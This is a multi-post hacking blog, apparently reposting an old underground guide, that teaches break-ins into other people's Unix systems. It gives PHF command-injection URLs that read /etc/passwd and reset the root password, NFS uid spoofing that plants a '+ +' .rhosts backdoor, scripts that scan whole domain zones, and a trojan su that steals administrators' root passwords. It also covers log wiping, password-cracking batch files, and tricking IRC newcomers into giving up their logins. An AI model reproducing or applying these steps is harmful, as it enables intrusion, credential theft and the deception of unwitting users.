Hacking Basics

Rest of the post of this series

2007-02-06T04:49:00.000+05:30

You can get rest of the post of this series from here: http://blogs.ibibo.com/hacking

I was just trying this new blogging service. And I'm too lazy to copy all the stuff from there to here. So, refer to the link given for missing posts.

I'll continue writing here now.

PHF WWW PH Query

2007-01-12T04:43:00.000+05:30

There is a program in the WWW cgi-bin directory called phf, if the file
is there, and has permission x, you can access it by using the www, or
a text version browser in linux called lynx. Now you can read files on the
system (yup .. /etc/passwd) and save them to files local in your computer.

There are many things we can get done here. If the server is running their
httpd server as root owner, we can be root by using phf and even change an
account password on the machine.

I will include a perl script here that will auto check all of the systems out
there by using the getdomain.pl script above and check what the server is
running under. If it is running under root, it will just log the id, if the
server is not running under root, it will auto get the passwd file from the
/etc directory and name it domainname.???.passwd.

I will also attach a script that will allow you to use a simple command from
a shell and if phf is on the system allow you to pipe commands from the shell
to the remote system with one command line.

Ok now that you know what is coming, lets teach you how to use phf.

Use your favorite web browser, or the text version in unix called most of
the time lynx, on some systems www.

After the screen comes up type the letter g, now a line appears like below:

URL to open:
Arrow keys: Up and Down to move. Right to follow a link; Left to go back.
H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list

You type:

URL to open: http://xxx.org/cgi-bin/phf/?Qalias=x%0aid
Arrow keys: Up and Down to move. Right to follow a link; Left to go back.
H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list

It returns:

QUERY RESULTS

/usr/local/bin/ph -m alias=x id

uid=65534(nobody) gid=65535(nogroup) groups=65535(nogroup)

So here we see it is running under a user (nobody), so we can be a user named
nobody on this system. We are not root, but this will have to do ;)

Notice the command line:

http://afp.org/cgi-bin/phf/?Qalias=x%0aid

The id was the command to the server to give us the id of the user. Some times
you will have to give the full path to the file you want to run, in this case
it would have been: http://afp.org/cgi-bin/phf/?Qalias=x%0a/usr/bin/id

Notice that after the %0a you start your command line. If you need to enter
a space you would put a %20 instead of the space. Here would be some sample
command lines. I will start them with %0a

Cat the passwd file
%0a/bin/cat%20/etc/passwd

Get a long directory of the /etc directory of all files starting with pass
%0als%20-al%20/etc/pass*

backup the passwd file if you have root access to httpd to passwd.my
%0acp%20/etc/passwd%20/etc/passwd.my

Change the root passwd (if the server will let you (most times it works)
%0apasswd%20root

(the above should let you login without a password, make sure to copy the
passwd.my file over the passwd file right away, and then delete the backup,
then make yourself an suid bash shell somewhere and rename it, sniff to get
your passwords)

If you know how to type commands in unix and don't forget that you need to
use %20 in the place of spaces, you will not have any problems!

Ok lets cat the passwd file on this box ;)

URL to open: http://xxx.org/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd

We get:

QUERY RESULTS

/usr/local/bin/ph -m alias=x cat /etc/passwd

root:R0rmc6lxVwi5I:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:-2:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
bhilton:LkjLiWy08xIWY:501:100:Bob Hilton:/home/bhilton:/bin/bash
web:Kn0d4HJPfRSoM:502:100:Web Master:/home/web:/bin/bash
mary:EauDLA/PT/HQg:503:100:Mary C. Hilton:/home/mary:/bin/bash

A small passwd file rin

If you want to save this to a file in your local directory, just choose the
print option in the text browser and you will get an option to save the file
in your home directory.

Lets learn something here:

mary:EauDLA/PT/HQg:503:100:Mary C. Hilton:/home/mary:/bin/bash
1 :2 :3 :4 :5 :6 :7

1=username 2=encrypted password 3=user number 4=groop id 5=real name
6=home directory 7=shell

Ok, lets say you do not want to keep using the WWW browser, here is a script
you can compile to just type regular commands from your shell. (in next post)

Whats next...???

2007-01-10T04:42:00.000+05:30

Next are some ways to get password files from unix systems. Most of them
you will need an account, but there is still a way to access to the system
without having an account. Here you will learn the difference between a
regular passwd file and a shadowed passwd file. You will also learn a way
to read the shadowed password file.

Mount the drives

2007-01-10T04:41:00.000+05:30

Ok, now on to mounting the drives ....

lets say we did a showmount -e domain.com and got back:

Export list for domain.com:
/ (everyone)
/p1 (everyone)
/p2 (everyone)
/p3 (everyone)
/p5 (everyone)
/p6 (everyone)
/p7 (everyone)
/var/spool/mail titan,europa,galifrey
/tmp (everyone)

We would want to mount / .. yup .... this guy has his entire system mountable!

$root> mkdir /tmp/mount
$root> mount -nt nfs domain.com:/ /tmp/mount

If he had the home directory mountable the command would be:

$root> mount -nt nfs domain.com:/home /tmp/mount

To unmount the system, make sure you are out of the directory and type:
$root> umount /tmp/mount

Make sure you make the mount directory first, you can make this anywhere on the
system that you want. If the systems /mnt directory is empty you can use it
also.

Ok this is for real:

bash# ls -al /mnt ; making sure the mnt dir is empty
ls: /mnt: No such file or directory ; there was not even a dir there ;)
bash# mkdir /mnt ; lets make one for them rin
bash# mount -nt nfs xxxxxx.xxx:/export/usr /mnt ; let's mount the sucker ...
bash# cd /mnt ; changing to the mounted drive...
bash# ls ; just the plain dir ..
TT_DB home raddb share
back local radius-961029.gz www
exec lost+found radius-961029.ps
bash# ; there is is up there, the home dir ... oh good ...
bash# cd home
bash# ls -l ; long directory listing ... tom is looking good here ;)
total 18
drwxr-xr-x 2 judy other 512 Feb 1 10:41 garry
drwxr-xr-x 69 infobahn other 5632 Mar 10 01:42 horke
drwxr-xr-x 11 301 other 2048 Mar 1 10:25 jens
drwxr-xr-x 2 300 other 512 Oct 15 07:45 joerg
drwxr-xr-x 2 604 other 512 Feb 8 13:00 mailadmin
drwxr-xr-x 2 melissa other 512 Sep 27 06:15 mk
drwxr-xr-x 6 news news 512 Mar 6 1996 news
drwxr-xr-x 2 303 other 512 Jan 24 04:17 norbert
drwxr-xr-x 4 jim other 512 Sep 27 06:16 pauk
drwxr-xr-x 2 302 other 512 Mar 1 10:10 tom
drwxr-xr-x 5 601 daemon 512 Jan 26 1996 viewx
drwxr-xr-x 10 15 audio 512 Oct 17 08:03 www
bash# ; notice tom is user number 302 ... hmmm lets put him in our passwd file
bash# pico /etc/passwd
tom:x:302:2::/home:/bin/bash ; this should do it ;)
bash# su - tom ; su to the tom account ...
bash$ ls -l
total 18
drwxr-xr-x 2 judy other 512 Feb 1 10:41 garry
drwxr-xr-x 69 infobahn other 5632 Mar 10 01:42 horke
drwxr-xr-x 11 301 other 2048 Mar 1 10:25 jens
drwxr-xr-x 2 300 other 512 Oct 15 07:45 joerg
drwxr-xr-x 2 604 other 512 Feb 8 13:00 mailadmin
drwxr-xr-x 2 melissa other 512 Sep 27 06:15 mk
drwxr-xr-x 6 news news 512 Mar 6 1996 news
drwxr-xr-x 2 303 other 512 Jan 24 04:17 norbert
drwxr-xr-x 4 jim other 512 Sep 27 06:16 pauk
drwxr-xr-x 2 tom other 512 Mar 1 10:10 tom
drwxr-xr-x 5 601 daemon 512 Jan 26 1996 view
drwxr-xr-x 10 15 audio 512 Oct 17 08:03 www
bash$ ; NOTICE above that toms user number is gone ... we now own his dir!
bash$ echo + +>>tom/.rhosts ; this will make a file in his dir called .rhosts
bash$ ;inside .rhosts will be wild cards + + for anyone to rlogin to his account
bash$ rlogin xxxxx.xxx we are tom on our machine, so lets just rlogin plain.
Last login: Fri Mar 7 00:16:03 from xxxxx.xxxxxxxxxx
Sun Microsystems Inc. SunOS 5.5 Generic November 1995
> ; yup we are in!
> ls -al
total 8
drwxr-xr-x 2 tom group 512 Mar 1 17:10 .
drwxr-xr-x 14 tom group 512 Jan 24 11:16 ..
-rw-r--r-- 1 tom group 144 Dec 30 15:32 .proofile
-rw-r--r-- 1 tom bin 8 Mar 11 08:26 .rhoosts
>

So now we have access, so lets just hack this system ... oops, that is another
lesson! Have pun!

cmount.pl

2007-01-09T04:40:00.000+05:30

To use this script simply use the domain ripper in the PHF section and download
the needed files from rs.internic.net rip some domains and name the file
'domains' and startup the script. To make it run in the background put a
& after the command. like this: cmount.pl&

How it works:

When you run the file it will go to the domains list and run showmount -e
on each domain, if it finds that there is a return on mountable drives
it will save the info in the current directory in files named:
domain.XXX.export. All you have to do is view the files and mount the drives!

--------------- start of cmount.pl
#!/usr/bin/perl -w
#
# Check NFS exports of hosts listed in file.
# (Hosts are listed, once per line with no additional whitespaces.)
#
# ii@dormroom.pyro.net - 2/27/97.

# Assign null list to @URLs which will be added to later.
my(@result) = ();
my(@domains) = ();
my($program) = "showmount -e ";

# Pull off filename from commandline. If it isn't defined, then assign default.
my($DomainFilename) = shift;
$DomainFilename = "domains" if !defined($DomainFilename);

# Do checking on input.
die("mountDomains: $DomainFilename is a directory.\n") if (-d $DomainFilename);

# Open $DomainFilename.
open(DOMAINFILE, $DomainFilename) or
die("mountDomains: Cannot open $DomainFilename for input.\n");

while () {
chomp($_);
print "Now checking: $_";

# Note difference in program output capture from "geturl.pl".
open (EXECFILE, "$program $_ |");
@execResult = ;
next if (!defined($execResult[0]));
if ($execResult[0] =~ /^Export/) {
print " - Export list saved.";
open (OUTFILE, ">$_.export");
foreach (@execResult) {
print OUTFILE;
}
close (OUTFILE);
}
close(EXECFILE);
print "\n";
}

# We are done. Close all files and end the program.
close (DOMAINFILE);

0;
----------------- end of cmount.pl

using Mount to gain access to unix systems

2007-01-08T04:40:00.000+05:30

This is not hard to do and there are many systems out there that are mountable.
Mount is a command in unix that will allow you to mount remote machines drives
you yours. This is done so you can do installs from other machines, or just
share drives or directories across the network. The problem is that many
admins are good with unix commands or setup. Or maybe they are just plain
lazy and mount the drives with world access not understanding that the world
can mount the drive and gain write access to their users directories.

What you will need to get started here is a hacked root account. To be able to
mount the remote drive and gain access you will need to modify the system's
password file and use the su command.

Ok let's say we have root access. let's get started!

You can see if another system has mountable drives by using the showmount
command.

From root account:

$root> showmount -e wwa.com
mount clntudp_create: RPC: Port mapper failure - RPC: Unable to receive

Ok, no problem, this domain will not work, go on to the next one...

$root> showmount -e seva.net
Export list for seva.net:
/var/mail pluto.seva.net
/home/user1 pluto.seva.net
/usr/local pluto.seva.net,rover.seva.net
/export/X11R6.3 rover.seva.net
/export/rover rover.seva.net,pluto.seva.net
/export/ftp/linux-archive/redhat-4.1/i386/RedHat (everyone)

Notice the (everyone), this would be good if we wanted to install linux
from this guy's box, but we want open directories to users.... so go on to
the next one...

$root> showmount -e XXXXX.XXX < this one worked ... find your own ;)
Export list for XXXXX.XXX:
/export/home (everyone)

Now this guy mounted his home directory, the user accounts are off of the home
directory ;) and look above ... (everyone) can access it!

Ok, this section was to show you how to see if they are mountable, in the next
section i will show you how to mount and hack it. But for now, here is a
script that will scan for EVERY DOMAIN on the internet that is mountable and
log them for you. (Next post)

pop3hack.c

2007-01-08T04:38:00.000+05:30

pop3hack.c
----- cut here

#include
#include
#include
#include
#include
#include
#include
#include
#include

/* First, define the POP-3 port - almost always 110 */
#define POP3_PORT 110

/* What we want our program to be masked as, so nosy sys admin's don't kill us */
#define MASKAS "vi"

/* Repeat connect or not - remember, logs still report a connection, so
you might want to set this to 0. If set to 0, it will hack until it finds
1 user/password then exit. If set to 1, it will reconnect and try more
user/passwords (until it runs out of usernames) */
#define RECONNECT 0

----- cut here

You could also write a small perl script that will finger @ from a domain
list and cat the response to a file, then when done it will go back and try
to login using pop3d username-username (or other info) and putting the
response into another file for you.

You can ftp to rs.internic.net:
in the domain directory you will find:

com.zone.gz
edu.zone.gz
gov.zone.gz
mil.zone.gz
net.zone.gz
org.zone.gz

download these files and run getdomain.pl (In next post) on the domains you
want to target first, in this manor:

"perl getdomain.pl com.zone com >com.all"

What this will do is rip all of the .COM domains and put them into a file
called comm.all.

If you wanted to do all of the .EDU addresses you would type:

perl getdomain.pl edu.zone edu >edu.all

Now you will have a list to use with your probe called edu.all

getdomain.pl

2007-01-07T04:39:00.000+05:30

getdomain.pl
---- cut here
#!/usr/bin/perl

# GetDomain By Nfin8 / Invisible Evil
# Questions /msg i-e or /msg i^e
#
# Retrieve command line arguments.
my($inputfile, $domain) = @ARGV;
usage() if (!defined($inputfile) || !defined($domain));

# Open and preprocess the input file.
open(INFILE, "<$inputfile") or die("Cannot open file $inputfile for reading!\n");
my(@lines) = ;

# Initialize main data structure.
my(%hash) = {};
my($key) = "";

foreach (@lines) {
$key = (split(/\ /))[0];
chop($key);
next if ((($key =~ tr/.//) < 1) ||
(uc($domain) ne uc(((split(/\./, $key))[-1]))) ||
($key =~ m/root-server/i));
$hash{$key}++;
}

# Close input file and output data structure to STDOUT.
close(INFILE);

foreach (sort(keys(%hash))) {
print "$_\n";
}

sub usage {
print("\n\ngetdomain:\n");
print("Usage: getdomain [inputfile] [search]\n\n");
print("Where [search] is one of \'com\', \'edu\', \'gov\', \'mil\' or \'net\'.\n\n");
exit(0);
}

0;

---- cut here - end of script -----

To use the script above all you need to do is copy between the lines above
and name it getdomain.pl, now copy it into the unix os and type
chmod +x getdomain.pl

Now it is ready to run with the command lines above.

The hard way

2007-01-06T04:37:00.000+05:30

There is another way you can do this. Be sure that on most big systems
that users do not use secure passwords. from a shell do this:

finger @domainname.com Watch I will do a real domain:

[10:35am][/home/ii]finger @starnet.net
[starnet.net]
Login Name Tty Idle Login Time Office Office Phone
chris Chris Myers p2 4:46 Jan 27 11:19
mike Mike Suter p1 4:57 Jan 22 16:14
mike Mike Suter p5 3d Jan 16 15:35
root System Administrator p3 4:59 Jan 16 10:17
wendt Catherine Wendt-Bern p0 3 Jan 21 14:49
[10:35am][/home/ii]

Now we might want to try logging in later, log this information:

Login chris Password try: Chris, chris, myers, Myers, chrismyers, etc...

This one looks good, wendt:Catherine:catherine

Here is another command:

[10:35am][/home/ii]finger -l @starnet.net
[starnet.net]

Login: mike Name: Mike Suter
Directory: /usra/staff/mike Shell: /bin/csh
On since Wed Jan 22 16:14 (CST) on ttyp1, idle 5:26, from mikesbox.starnet.net
On since Thu Jan 16 15:35 (CST) on ttyp5, idle 3 days 22:00, from mikesbox
Last login Sun Jan 26 23:07 (CST) on ttyp2 from hurk
No Plan.

Login: root Name: System Administrator
Directory: /root Shell: /bin/csh
On since Thu Jan 16 10:17 (CST) on ttyp3, idle 5:28, from mikesbox.starnet.net
Last login Thu Jan 16 18:07 (CST) on ttyp6 from mikesbox.starnet.net
Mail forwarded to:
\chris@admin.starnet.net
#\chris@admin.starnet.net, \mike@admin.starnet.net
No Plan.

Login: wendt Name: Catherine Wendt-Bernal
Directory: /usra/staff/wendt Shell: /bin/csh
On since Tue Jan 21 14:49 (CST) on ttyp0, idle 0:02, from veggedout
No Plan.

You get more info to play with ;)

I know this can make you tired ....

Remember this stuff will log your tries, so if you get on and get root, clean
the logs ;)

In next post, you will get a small .c file you can use if you get on.

Talking to newbe's

2007-01-04T04:33:00.000+05:30

There are other ways to get an account without doing much work. Park yourself
on an irc channel that you made with a title about hacking. Also try joining
other channels already on the irc. Channels would include:
#hacking #unix #unixhacking #hack #hackers #hacker #virus #virii
#hackers_hideout or any others you can find.

Now what you are looking for are newbe's looking to learn or exploit their shell
they are on already. There is always someone out there that does not know as
much as you. Watch for someone out there that asks a newbe question and gets
no answer or even kicked off the channel. Here is your mark ;)

/msg him so that others can't see that you are talking to him, and begin to ask
him questions, try to help him, but not too much ;) Finally tell him that you
can login for him and do it. This could be to snatch the passwd file or god
knows what. Promise him the world and get that login password. Now you have
a start and can start your on-hands learning process. If you get root on the
system you might not want to expose that to him, but you can feed him other
goodies that will keep him busy while you sniff some other passwords on the
system.

So now if there are some out there that remember i-e when you gave him your
login and password, you can be sure that the above never happened rin ...

I tend to like to help people learn so I am telling the truth when i say I
have dealt honestly with most everyone I have come across.

Cracking passwd files

2007-01-02T01:06:00.000+05:30

If you are hacking with the right frame of mind, you will run the crack program until you get one good account that will let you into the system.

You will login and see if you can exploit root on the system, if so, get root, get the files you need to use into your nested directory, and erase your presence, and clean all of the logs. Now you are ready to load your sniffer.

Why go on hacking passwords for a system that within 24 hours you will have most of the passwords anyway? Not only for the machine you just hacked, but other machines that were connected to as well. If the system is not exploitable don't even waste your time on it, go on to the next. At a latter date if you want to crack passwords for accounts to trade go ahead.

If you get an admin's account cracked you might want to read his history files, and see if he is using the su command to access root allot. If he is you can use an su trojan on him. This will get you the root password. This works like this: You change his shell script so that a hidden directory (.term) is good, is set in the search path before all other directories. You put a fake su
binary in the .term (or other) directory. He types su, everything looks good to him, he types in the root password when prompted, the password id copied to a log file in /tmp/.elm69, and deletes the trojan su file, and returns to him a password error telling him to try again. He thinks he must have done something wrong and runs su again, but this time the real one and logs in.

You will find this fake su program in the end of this post named uuencoded files. (Do you know what are uuencoded files? How to decode. Try finding out... :D)

Here are the docs:

Fake SU by Nfin8 - i-e

IRC: /msg i-e

Easy as 1,2,3 ...

1. Change the path in one of the user accounts that you have access to that you see is using SU from reading their history files, to hit a path first that you have placed the su trojan file into. .term or .elm is good!

2. Make sure to edit the top of the su.c file to the path you will be using so that the sutrojan will delete isself and let the real SU work for the second try.

3. Put all of the files in the target directory and compile the su.c file.

gcc su.c -o su

Then delete all of the files but the su. All done!

.bash_profile might look like this:

# .bash_profile

# Get the aliases and functions
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi

# User specific environment and startup programs

PATH=$PATH:$HOME/bin
ENV=$HOME/.bashrc
USERNAME=""

export USERNAME ENV PATH

You change the first line to: PATH=$HOME/.term:$PATH:$HOME/bin

When the sys admin run's 'SU' it will run the SU-trojan in the .term directory first and report that the password he typed was wrong, the Trojan su program would have put a hidden file in the /tmp directory for you that contains the root password (or account passwd) typed. If it was
an account rather then the root password it will let you know the account name. Then the trojan su program deletes itself so that the next try will get the real su program.

You can find the admin's at the top section of the passwd file in the /etc directory. Just type : more passwd

You can be sure that the first two real accounts made in the passwd file are admin's, also sometimes you can find others by where their directories are located in the password file. Like /staff/username.

The history files are in each users account directory. You can read these to see what the last commands were that were typed by the user. Sometimes as much as the last 100+ commands. Look for the file .bash_history, or History, you can read these using more. command: more .bash_history, or most times to keep your typing you can type : more .b* (or) just type : more .b (and then hit the tab key on your keyboard).

Ok so now you need a good password cracking program. You can see in the next chapter on how to get password files from systems that you do not have an account on, but it is catch 22, you need the password cracking program too.

There are three things that you will need.

1. Password cracking program
2. Good word files
3. Password files

The best password cracking program to start would be crackerjack. You can search the web and find this easy as 1,2,3. Download it and you are ready to go. If you are a bit more advanced you can download a cjack for unix and run it in a shell. But if you are just getting started get the DOS/OS/2 version.

Also search for some good word files. The best word files are the names. You will find that most unsecured passwords out there are guy's girlfriends names, of girls boyfriends names ;) You will find word files like 'familynames' 'babynames' 'girlsnames' 'boysnames' 'commonpasswords'
hackersdict' and other like these to be the best.

Load crackerjack like this:

[D:\jack]jack

Cracker Jack version 1.4 for OS/2 and DOS (386)
Copyright (C) 1993, The Jackal, Denmark

PWfile(s) : domain.com.passwd

Wordfile : domain.com.passwd

Like above run the password file as the wordfile first. This will get you all of the logon's first that used their login name as their password, also if they used any other info like their real name or company name it will hit right away and you will not have to wait for the program to search through a word file.

If you want to hash the word file to get more out of it you can read the doc's for crackerjack.

Hashing is where you can tell crackerjack to change the case of the wordfile or even add numbers or letters to the beginning or end of the words in the word file, like sandy1 or 1sandy. You will find that many users do this and think they are more secure.

Here are hashing files for both the passwd file and your word list. After
looking these over you will see how you can modify these or create new ones
to suit your needs.

------------ start of dicthash.bat
@echo off
cls
echo - THIS FILE FOR DOS MACHINES
echo ----------------------------------------------------------------------
echo - To work this batch file have all of the crackerjack files in the
echo - current directory with this batch file, along with your dict and
echo - password file. Then use this batch file using the following format:
echo -
echo - dicthash.bat dictfilename.ext passwordfilename.ext
echo -
echo - Make sure to have the jpp.exe and jsort.exe files in your dir as well.
echo -
echo - dicthash will first load jack running the dict file against your
echo - password file in both cases, then it will add numbers 0-9 both to
echo - the begining and end of every dict word. This will take a while,
echo - so go out for that week vacation!
echo -
echo - If you get tired you can 'ctrl c' to the next option or number.
echo -
echo - ii@dormroom.pyro.net
echo -
echo - Mail me some of your hits, let me know how this works for you ;)

jpp -lower %1 | jack -stdin %2
jpp %1 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.1 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.1 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.2 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.2 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.3 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.3 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.4 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.4 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.5 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.5 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.6 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.6 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.7 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.7 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.8 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.8 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.9 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.9 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.0 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.0 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %2

---------------- end of dicthash.bat

---------------- start of jackhash.bat
@echo off
cls
echo - THIS FILE FOR DOS
echo ----------------------------------------------------------------------
echo - To work this batch file have all of the crackerjack files in the
echo - current directory with this batch file, along with your password file.
echo - Then use this batch file using the following format:
echo -
echo - jackhash.bat passwordfilename.ext
echo -
echo - Make sure to have the jpp.exe and jsort.exe files in your dir as well.
echo -
echo - jackhash will first load jack running the passwd file against
echo - itself in both upper and lower cases, then it will add numbers 0-9
echo - both to the begining and end of every dict word. This will take
echo - a while, so go out for that week vacation!
echo -
echo - If you get tired you can 'ctrl c' to the next option or number.
echo -
echo - ii@dormroom.pyro.net
echo -
echo - Mail me some of your hits, let me know how this works for you ;)

jpp -gecos:5 -lower %1 | jack -stdin %1
jpp -gecos:5 %1 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.q | jack -stdin %1

jpp -gecos:2 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
